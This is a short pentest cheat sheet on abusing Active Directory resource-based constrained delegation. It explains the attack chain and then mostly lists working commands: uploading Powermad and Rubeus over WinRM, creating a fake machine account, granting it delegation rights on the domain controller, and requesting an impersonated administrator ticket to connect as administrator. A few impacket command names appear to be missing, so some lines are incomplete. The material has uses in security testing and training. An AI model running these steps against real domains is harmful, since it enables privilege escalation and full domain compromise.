Resource-based Constrained Delegation


  • We have code execution on the computer (COM01) as the current user.

  • User creates a new computer object (FAKE01).

  • User leverages the WRITE privilege on the (COM01) computer object and updates its object's attribute msDS-AllowedToActOnBehalfOfOtherIdentity to enable the newly created computer (FAKE01) to impersonate and authenticate any domain user that can then access the target system (COM01). (COM01) trusts (FAKE01) due to the modified msDS-AllowedToActOnBehalfOfOtherIdentity.

  • We request Kerberos tickets for (FAKE01)$ with ability to impersonate an admin user.

Tools needed


Assumption is that the attacker has access to the system through winrm


# Verify if user can add new computers
Get-DomainObject -Identity 'dc=domain,dc=local' | select 

# Upload tools
upload Powermad.ps1 Powermad.ps1
upload Rubeus.exe Rubeus.exe

# Import PowerMad
Import-Module Powermad.ps1

# Set variables
Set-Variable -Name "FakeComputer" -Value "FAKE01"
Set-Variable -Name "target" -Value "DC"

# With Powermad, Add the new fake computer object to AD.
New-MachineAccount -MachineAccount (Get-Variable -Name "FakeComputer").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer (Get-Variable -Name "target").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakeComputer").Value + '$')

# With Built-in AD modules, check that the last command worked.
Get-ADComputer (Get-Variable -Name "target").Value -Properties PrincipalsAllowedToDelegateToAccount

# With Rubeus, generate the new fake computer object password hashes. (Keep these for the next step)
.\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:domain.local


# Generate a ccached TGT domain.local/FAKE01 -dc-ip dc.domain.local -impersonate administrator -spn http/dc.domain.local -aesKey <aes key from Rubeus output>

# Set KRB5CCNAME environment variable to point to the newly created ccache file
export KRB5CCNAME=administrator.ccache

# Use to connect to the remote server domain.local/administrator@dc.domain.local -no-pass -k


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